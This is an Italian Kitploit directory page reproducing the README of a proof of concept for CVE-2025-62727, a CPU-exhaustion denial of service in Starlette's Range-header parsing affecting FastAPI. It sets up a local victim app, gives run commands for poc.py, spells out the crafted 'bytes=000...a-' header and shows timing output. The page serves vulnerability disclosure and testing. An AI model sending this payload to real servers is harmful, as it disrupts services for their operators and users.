Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-62727-Demo — Prova di concetto di CVE-2025-62727 che può causare denial-of-service in FastAPI (basato su Starlette <= 0.48.0) | Kitploit
Strumenti/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
Analisi delle VulnerabilitàExploitSicurezza WebSicurezza delle API
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

Prova di concetto di CVE-2025-62727 che può causare denial-of-service in FastAPI (basato su Starlette <= 0.48.0)

Vedi Repository
1710 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Demo CVE-2025-62727

Descrizione della Vittima

La vittima designata di CVE-2025-62727 è una semplice app FastAPI che:

  • Serve Hello World su /.
  • Serve file statici sotto /static utilizzando StaticFiles di Starlette.
  • Genera automaticamente file di testo contenenti A ripetuta N volte per N in 1024, 2048, 50176 all'avvio.

Come eseguire la vittima

  1. (Opzionale) Creare e attivare un virtualenv.

  2. Installare le dipendenze:

    root@kitploit:~
    pip install -r requirements.txt
    
  • Avviare il server:

    root@kitploit:~
    uvicorn main:app --reload
    
  • Aprire:

    • http://127.0.0.1:8000/ per la pagina principale.
    • http://127.0.0.1:8000/static/1024.txt ecc. per i file statici.

    Note

    • I file statici vengono generati nella directory static/ all'avvio dell'app. I file esistenti non vengono sovrascritti.
    • Il servizio statico utilizza StaticFiles di Starlette come richiesto.

    PoC: CVE-2025-62727 (Parsing dell'header Range)

    Il poc.py incluso attiva il parsing CPU-intensive dell'header Range in FileResponse di Starlette tramite la rotta /static utilizzando un header costruito ad arte della forma bytes=000...000a-.

    Avviare il server, poi in un'altra shell:

    root@kitploit:~
    python3 poc.py --sizes 1000,2000,4000,7000
    

    Sovrascrivere l'URL di destinazione (opzionale):

    root@kitploit:~
    python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
    

    Note:

    • Il PoC punta a http://127.0.0.1:8000/static/50176.txt di default (un file che l'app genera). Usare --url per cambiarlo.
    • Ridurre --sizes se si ricevono 400/431 (header troppo grande), o aumentarlo se gli header hanno successo e si desidera un effetto più forte.

    Esempio di risultato:

    root@kitploit:~
    $ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
    [INFO] Target: http://127.0.0.1:8000/static/50176.txt
    [MODE] regex (header = 'bytes=' + '0'*N + 'a-')
    N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
    N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
    N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
    N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
    
    Scarica lo strumento